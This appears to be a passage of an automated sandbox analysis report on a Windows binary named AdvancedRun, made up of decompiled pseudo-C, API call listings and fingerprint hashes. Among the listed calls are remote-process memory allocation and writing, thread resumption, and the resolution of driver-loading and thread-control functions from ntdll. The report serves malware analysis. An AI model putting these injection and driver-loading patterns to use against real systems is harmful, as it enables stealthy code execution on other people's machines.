                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                  • memset.MSVCRT ref: 0040A66E
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                  • API String ID: 1572607441-20550370
                                                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                  				struct tagPOINT _v12;
                                                                                                  				void* __esi;
                                                                                                  				void* _t47;
                                                                                                  				struct HBRUSH__* _t56;
                                                                                                  				void* _t61;
                                                                                                  				unsigned int _t63;
                                                                                                  				void* _t68;
                                                                                                  				struct HWND__* _t69;
                                                                                                  				struct HWND__* _t70;
                                                                                                  				void* _t73;
                                                                                                  				unsigned int _t74;
                                                                                                  				struct HWND__* _t76;
                                                                                                  				struct HWND__* _t77;
                                                                                                  				struct HWND__* _t78;
                                                                                                  				struct HWND__* _t79;
                                                                                                  				unsigned int _t85;
                                                                                                  				struct HWND__* _t87;
                                                                                                  				struct HWND__* _t89;
                                                                                                  				struct HWND__* _t90;
                                                                                                  				struct tagPOINT _t96;
                                                                                                  				struct tagPOINT _t98;
                                                                                                  				signed short _t103;
                                                                                                  				void* _t106;
                                                                                                  				void* _t117;
                                                                                                  
                                                                                                  				_t106 = __edx;
                                                                                                  				_push(__ecx);
                                                                                                  				_push(__ecx);
                                                                                                  				_t47 = _a4 - 0x110;
                                                                                                  				_t117 = __ecx;
                                                                                                  				if(_t47 == 0) {
                                                                                                  					__eflags =  *0x40feb0;
                                                                                                  					if(__eflags != 0) {
                                                                                                  						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                  					} else {
                                                                                                  						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                  						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                  					}
                                                                                                  					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                  					E0040103E(_t117, __eflags);
                                                                                                  					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                  					goto L30;
                                                                                                  				} else {
                                                                                                  					_t61 = _t47 - 1;
                                                                                                  					if(_t61 == 0) {
                                                                                                  						_t103 = _a8;
                                                                                                  						_t63 = _t103 >> 0x10;
                                                                                                  						__eflags = _t103 - 1;
                                                                                                  						if(_t103 == 1) {
                                                                                                  							L24:
                                                                                                  							__eflags = _t63;
                                                                                                  							if(_t63 != 0) {
                                                                                                  								goto L30;
                                                                                                  							} else {
                                                                                                  								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                  								DeleteObject( *(_t117 + 0x43c));
                                                                                                  								goto L8;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							__eflags = _t103 - 2;
                                                                                                  							if(_t103 != 2) {
                                                                                                  								goto L30;
                                                                                                  							} else {
                                                                                                  								goto L24;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t68 = _t61 - 0x27;
                                                                                                  						if(_t68 == 0) {
                                                                                                  							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                  							__eflags = _a12 - _t69;
                                                                                                  							if(_a12 != _t69) {
                                                                                                  								__eflags =  *0x40ff30;
                                                                                                  								if( *0x40ff30 == 0) {
                                                                                                  									goto L30;
                                                                                                  								} else {
                                                                                                  									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                  									__eflags = _a12 - _t70;
                                                                                                  									if(_a12 != _t70) {
                                                                                                  										goto L30;
                                                                                                  									} else {
                                                                                                  										goto L18;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								L18:
                                                                                                  								SetBkMode(_a8, 1);
                                                                                                  								SetTextColor(_a8, 0xc00000);
                                                                                                  								_t56 = GetSysColorBrush(0xf);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t73 = _t68 - 0xc8;
                                                                                                  							if(_t73 == 0) {
                                                                                                  								_t74 = _a12;
                                                                                                  								_t96 = _t74 & 0x0000ffff;
                                                                                                  								_v12.x = _t96;
                                                                                                  								_v12.y = _t74 >> 0x10;
                                                                                                  								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                  								_push(_v12.y);
                                                                                                  								_a8 = _t76;
                                                                                                  								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                  								__eflags = _t77 - _a8;
                                                                                                  								if(_t77 != _a8) {
                                                                                                  									__eflags =  *0x40ff30;
                                                                                                  									if( *0x40ff30 == 0) {
                                                                                                  										goto L30;
                                                                                                  									} else {
                                                                                                  										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                  										_push(_v12.y);
                                                                                                  										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                  										__eflags = _t79 - _t78;
                                                                                                  										if(_t79 != _t78) {
                                                                                                  											goto L30;
                                                                                                  										} else {
                                                                                                  											goto L13;
                                                                                                  										}
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									L13:
                                                                                                  									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                  									goto L8;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								if(_t73 != 0) {
                                                                                                  									L30:
                                                                                                  									_t56 = 0;
                                                                                                  									__eflags = 0;
                                                                                                  								} else {
                                                                                                  									_t85 = _a12;
                                                                                                  									_t98 = _t85 & 0x0000ffff;
                                                                                                  									_v12.x = _t98;
                                                                                                  									_v12.y = _t85 >> 0x10;
                                                                                                  									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                  									_push(_v12.y);
                                                                                                  									_a8 = _t87;
                                                                                                  									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                  										__eflags =  *0x40ff30;
                                                                                                  										if( *0x40ff30 == 0) {
                                                                                                  											goto L30;
                                                                                                  										} else {
                                                                                                  											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                  											_push(_v12.y);
                                                                                                  											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                  											__eflags = _t90 - _t89;
                                                                                                  											if(_t90 != _t89) {
                                                                                                  												goto L30;
                                                                                                  											} else {
                                                                                                  												_push(0x40ff30);
                                                                                                  												goto L7;
                                                                                                  											}
                                                                                                  										}
                                                                                                  									} else {
                                                                                                  										_push(_t117 + 0x23e);
                                                                                                  										L7:
                                                                                                  										_push( *(_t117 + 0x10));
                                                                                                  										E00404F7E();
                                                                                                  										L8:
                                                                                                  										_t56 = 1;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t56;
                                                                                                  			}



























                                                                                                  0x00401093
                                                                                                  0x00401096
                                                                                                  0x00401097
                                                                                                  0x0040109b
                                                                                                  0x004010a3
                                                                                                  0x004010a5
                                                                                                  0x00401270
                                                                                                  0x00401278
                                                                                                  0x004012b3
                                                                                                  0x0040127a
                                                                                                  0x00401293
                                                                                                  0x004012a2
                                                                                                  0x004012a2
                                                                                                  0x004012c1
                                                                                                  0x004012d9
                                                                                                  0x004012ea
                                                                                                  0x004012ec
                                                                                                  0x004012f6
                                                                                                  0x00000000
                                                                                                  0x004010ab
                                                                                                  0x004010ab
                                                                                                  0x004010ac
                                                                                                  0x00401231
                                                                                                  0x00401236
                                                                                                  0x00401239
                                                                                                  0x0040123d
                                                                                                  0x00401249
                                                                                                  0x00401249
                                                                                                  0x0040124c
                                                                                                  0x00000000
                                                                                                  0x00401252
                                                                                                  0x00401259
                                                                                                  0x00401265
                                                                                                  0x00000000
                                                                                                  0x00401265
                                                                                                  0x0040123f
                                                                                                  0x0040123f
                                                                                                  0x00401243
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00401243
                                                                                                  0x004010b2
                                                                                                  0x004010b2
                                                                                                  0x004010b5
                                                                                                  0x004011e1
                                                                                                  0x004011e3
                                                                                                  0x004011e6
                                                                                                  0x0040120e
                                                                                                  0x00401216
                                                                                                  0x00000000
                                                                                                  0x0040121c
                                                                                                  0x00401224
                                                                                                  0x00401226
                                                                                                  0x00401229
                                                                                                  0x00000000
                                                                                                  0x0040122f
                                                                                                  0x00000000
                                                                                                  0x0040122f
                                                                                                  0x00401229
                                                                                                  0x004011e8
                                                                                                  0x004011e8
                                                                                                  0x004011ed
                                                                                                  0x004011fb
                                                                                                  0x00401203
                                                                                                  0x00401203
                                                                                                  0x004010bb
                                                                                                  0x004010bb
                                                                                                  0x004010c0
                                                                                                  0x00401151
                                                                                                  0x0040115a
                                                                                                  0x00401168
                                                                                                  0x0040116b
                                                                                                  0x0040116e
                                                                                                  0x00401170
                                                                                                  0x00401173
                                                                                                  0x00401180
                                                                                                  0x00401182
                                                                                                  0x00401185
                                                                                                  0x004011a4
                                                                                                  0x004011ac
                                                                                                  0x00000000
                                                                                                  0x004011b2
                                                                                                  0x004011ba
                                                                                                  0x004011bc
                                                                                                  0x004011c7
                                                                                                  0x004011c9
                                                                                                  0x004011cb
                                                                                                  0x00000000
                                                                                                  0x004011d1
                                                                                                  0x00000000
                                                                                                  0x004011d1
                                                                                                  0x004011cb
                                                                                                  0x00401187
                                                                                                  0x00401187
                                                                                                  0x00401199
                                                                                                  0x00000000
                                                                                                  0x00401199
                                                                                                  0x004010c6
                                                                                                  0x004010c8
                                                                                                  0x004012fd
                                                                                                  0x004012fd
                                                                                                  0x004012fd
                                                                                                  0x004010ce
                                                                                                  0x004010ce
                                                                                                  0x004010d7
                                                                                                  0x004010e5
                                                                                                  0x004010e8
                                                                                                  0x004010eb
                                                                                                  0x004010ed
                                                                                                  0x004010f0
                                                                                                  0x00401102
                                                                                                  0x0040111d
                                                                                                  0x00401125
                                                                                                  0x00000000
                                                                                                  0x0040112b
                                                                                                  0x00401133
                                                                                                  0x00401135
                                                                                                  0x00401140
                                                                                                  0x00401142
                                                                                                  0x00401144
                                                                                                  0x00000000
                                                                                                  0x0040114a
                                                                                                  0x0040114a
                                                                                                  0x00000000
                                                                                                  0x0040114a
                                                                                                  0x00401144
                                                                                                  0x00401104
                                                                                                  0x0040110a
                                                                                                  0x0040110b
                                                                                                  0x0040110b
                                                                                                  0x0040110e
                                                                                                  0x00401115
                                                                                                  0x00401117
                                                                                                  0x00401117
                                                                                                  0x00401102
                                                                                                  0x004010c8
                                                                                                  0x004010c0
                                                                                                  0x004010b5
                                                                                                  0x004010ac
                                                                                                  0x00401303

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                  • String ID: AdvancedRun
                                                                                                  • API String ID: 829165378-481304740
                                                                                                  • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                  • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                  • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                  • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408E31() {
                                                                                                  				void* _t1;
                                                                                                  				struct HINSTANCE__* _t2;
                                                                                                  				_Unknown_base(*)()* _t14;
                                                                                                  
                                                                                                  				if( *0x41c4ac == 0) {
                                                                                                  					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                  					 *0x41c4ac = _t2;
                                                                                                  					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                  					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                  					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                  					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                  					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                  					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                  					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                  					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                  					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                  					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                  					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                  					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                  					 *0x41c4a8 = _t14;
                                                                                                  					return _t14;
                                                                                                  				}
                                                                                                  				return _t1;
                                                                                                  			}






                                                                                                  0x00408e38
                                                                                                  0x00408e44
                                                                                                  0x00408e56
                                                                                                  0x00408e68
                                                                                                  0x00408e7a
                                                                                                  0x00408e8c
                                                                                                  0x00408e9e
                                                                                                  0x00408eb0
                                                                                                  0x00408ec2
                                                                                                  0x00408ed4
                                                                                                  0x00408ee6
                                                                                                  0x00408ef8
                                                                                                  0x00408f0a
                                                                                                  0x00408f1c
                                                                                                  0x00408f21
                                                                                                  0x00408f23
                                                                                                  0x00000000
                                                                                                  0x00408f28
                                                                                                  0x00408f29

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                  • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                  • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                  • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                  • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                  • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                  • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                  • API String ID: 667068680-4280973841
                                                                                                  • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                  • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                  • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                  • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 45%
                                                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                  				void _v259;
                                                                                                  				void _v260;
                                                                                                  				void _v515;
                                                                                                  				void _v516;
                                                                                                  				char _v1048;
                                                                                                  				void _v1052;
                                                                                                  				void _v1056;
                                                                                                  				void _v1560;
                                                                                                  				long _v1580;
                                                                                                  				void _v3626;
                                                                                                  				char _v3628;
                                                                                                  				void _v5674;
                                                                                                  				char _v5676;
                                                                                                  				void _v9770;
                                                                                                  				short _v9772;
                                                                                                  				void* __edi;
                                                                                                  				void* _t45;
                                                                                                  				void* _t60;
                                                                                                  				int _t61;
                                                                                                  				int _t63;
                                                                                                  				int _t64;
                                                                                                  				long _t68;
                                                                                                  				struct HWND__* _t94;
                                                                                                  				signed int _t103;
                                                                                                  				intOrPtr _t127;
                                                                                                  				unsigned int _t130;
                                                                                                  				void* _t132;
                                                                                                  				void* _t135;
                                                                                                  
                                                                                                  				E0040B550(0x2628, __ecx);
                                                                                                  				_t45 = _a8 - 0x110;
                                                                                                  				if(_t45 == 0) {
                                                                                                  					E00404DA9(__edx, _a4, 4);
                                                                                                  					_v9772 = 0;
                                                                                                  					memset( &_v9770, 0, 0xffe);
                                                                                                  					_t103 = 5;
                                                                                                  					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                  					memset( &_v1560, 0, 0x1f6);
                                                                                                  					_v260 = 0;
                                                                                                  					memset( &_v259, 0, 0xff);
                                                                                                  					_v516 = 0;
                                                                                                  					memset( &_v515, 0, 0xff);
                                                                                                  					_v5676 = 0;
                                                                                                  					memset( &_v5674, 0, 0x7fe);
                                                                                                  					_v3628 = 0;
                                                                                                  					memset( &_v3626, 0, 0x7fe);
                                                                                                  					_t135 = _t132 + 0x5c;
                                                                                                  					_t60 = GetCurrentProcess();
                                                                                                  					_t105 =  &_v260;
                                                                                                  					_a8 = _t60;
                                                                                                  					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                  					__eflags = _t61;
                                                                                                  					if(_t61 != 0) {
                                                                                                  						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                  						_pop(_t105);
                                                                                                  					}
                                                                                                  					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                  					__eflags = _t63;
                                                                                                  					if(_t63 != 0) {
                                                                                                  						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                  						_pop(_t105);
                                                                                                  					}
                                                                                                  					_t64 = E00404BD3();
                                                                                                  					__eflags = _t64;
                                                                                                  					if(_t64 == 0) {
                                                                                                  						E004090EE();
                                                                                                  					} else {
                                                                                                  						E00409172();
                                                                                                  					}
                                                                                                  					__eflags =  *0x4101b8;
                                                                                                  					if(__eflags != 0) {
                                                                                                  						L17:
                                                                                                  						_v1056 = 0;
                                                                                                  						memset( &_v1052, 0, 0x218);
                                                                                                  						_t127 =  *0x40f5d4; // 0x0
                                                                                                  						_t135 = _t135 + 0xc;
                                                                                                  						_t68 = GetCurrentProcessId();
                                                                                                  						_push(_t127);
                                                                                                  						_push(_t68);
                                                                                                  						 *0x40f84c = 0;
                                                                                                  						E004092F0(_t105, __eflags);
                                                                                                  						__eflags =  *0x40f84c; // 0x0
                                                                                                  						if(__eflags != 0) {
                                                                                                  							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                  							_t135 = _t135 + 0xc;
                                                                                                  							__eflags =  *0x40f84c; // 0x0
                                                                                                  							if(__eflags != 0) {
                                                                                                  								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L20;
                                                                                                  					} else {
                                                                                                  						__eflags =  *0x4101bc;
                                                                                                  						if(__eflags == 0) {
                                                                                                  							L20:
                                                                                                  							_push( &_v3628);
                                                                                                  							_push( &_v5676);
                                                                                                  							_push( *0x40f3b0);
                                                                                                  							_push( *0x40f3bc);
                                                                                                  							_push( *0x40f3ac);
                                                                                                  							_push( *0x40f394);
                                                                                                  							_push( *0x40f398);
                                                                                                  							_push( *0x40f3a0);
                                                                                                  							_push( *0x40f3a4);
                                                                                                  							_push( *0x40f39c);
                                                                                                  							_push( *0x40f3a8);
                                                                                                  							_push( &_v1580);
                                                                                                  							_push( *0x40f5d4);
                                                                                                  							_push( *0x40f5c8);
                                                                                                  							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                  							_push(0x800);
                                                                                                  							_push( &_v9772);
                                                                                                  							L0040B1EC();
                                                                                                  							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                  							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                  							L21:
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				if(_t45 == 1) {
                                                                                                  					_t130 = _a12;
                                                                                                  					if(_t130 >> 0x10 == 0) {
                                                                                                  						if(_t130 == 3) {
                                                                                                  							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                  							_a4 = _t94;
                                                                                                  							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                  							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                  							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				goto L21;
                                                                                                  			}































                                                                                                  0x00408ae3
                                                                                                  0x00408aeb
                                                                                                  0x00408af3
                                                                                                  0x00408b76
                                                                                                  0x00408b8a
                                                                                                  0x00408b91
                                                                                                  0x00408b98
                                                                                                  0x00408bb1
                                                                                                  0x00408bb3
                                                                                                  0x00408bc6
                                                                                                  0x00408bcc
                                                                                                  0x00408bda
                                                                                                  0x00408be0
                                                                                                  0x00408bf3
                                                                                                  0x00408bfa
                                                                                                  0x00408c0b
                                                                                                  0x00408c12
                                                                                                  0x00408c17
                                                                                                  0x00408c1a
                                                                                                  0x00408c2c
                                                                                                  0x00408c39
                                                                                                  0x00408c3d
                                                                                                  0x00408c3f
                                                                                                  0x00408c41
                                                                                                  0x00408c52
                                                                                                  0x00408c58
                                                                                                  0x00408c58
                                                                                                  0x00408c6f
                                                                                                  0x00408c71
                                                                                                  0x00408c73
                                                                                                  0x00408c83
                                                                                                  0x00408c89
                                                                                                  0x00408c89
                                                                                                  0x00408c8a
                                                                                                  0x00408c8f
                                                                                                  0x00408c91
                                                                                                  0x00408c9a
                                                                                                  0x00408c93
                                                                                                  0x00408c93
                                                                                                  0x00408c93
                                                                                                  0x00408c9f
                                                                                                  0x00408ca5
                                                                                                  0x00408caf
                                                                                                  0x00408cbc
                                                                                                  0x00408cc2
                                                                                                  0x00408cc7
                                                                                                  0x00408ccd
                                                                                                  0x00408cd0
                                                                                                  0x00408cd6
                                                                                                  0x00408cd7
                                                                                                  0x00408cd8
                                                                                                  0x00408cde
                                                                                                  0x00408ce3
                                                                                                  0x00408ceb
                                                                                                  0x00408cfe
                                                                                                  0x00408d03
                                                                                                  0x00408d06
                                                                                                  0x00408d0c
                                                                                                  0x00408d21
                                                                                                  0x00408d27
                                                                                                  0x00408d0c
                                                                                                  0x00000000
                                                                                                  0x00408ca7
                                                                                                  0x00408ca7
                                                                                                  0x00408cad
                                                                                                  0x00408d28
                                                                                                  0x00408d2e
                                                                                                  0x00408d35
                                                                                                  0x00408d36
                                                                                                  0x00408d42
                                                                                                  0x00408d48
                                                                                                  0x00408d4e
                                                                                                  0x00408d54
                                                                                                  0x00408d5a
                                                                                                  0x00408d60
                                                                                                  0x00408d66
                                                                                                  0x00408d6c
                                                                                                  0x00408d72
                                                                                                  0x00408d73
                                                                                                  0x00408d7f
                                                                                                  0x00408d85
                                                                                                  0x00408d8a
                                                                                                  0x00408d8f
                                                                                                  0x00408d90
                                                                                                  0x00408da8
                                                                                                  0x00408db9
                                                                                                  0x00408dbf
                                                                                                  0x00408dc5
                                                                                                  0x00408dc5
                                                                                                  0x00000000
                                                                                                  0x00408cad
                                                                                                  0x00408ca5
                                                                                                  0x00408af6
                                                                                                  0x00408afc
                                                                                                  0x00408b07
                                                                                                  0x00408b2a
                                                                                                  0x00408b38
                                                                                                  0x00408b53
                                                                                                  0x00408b56
                                                                                                  0x00408b62
                                                                                                  0x00408b6a
                                                                                                  0x00408b6a
                                                                                                  0x00408b2a
                                                                                                  0x00408b07
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • {Unknown}, xrefs: 00408BA5
                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
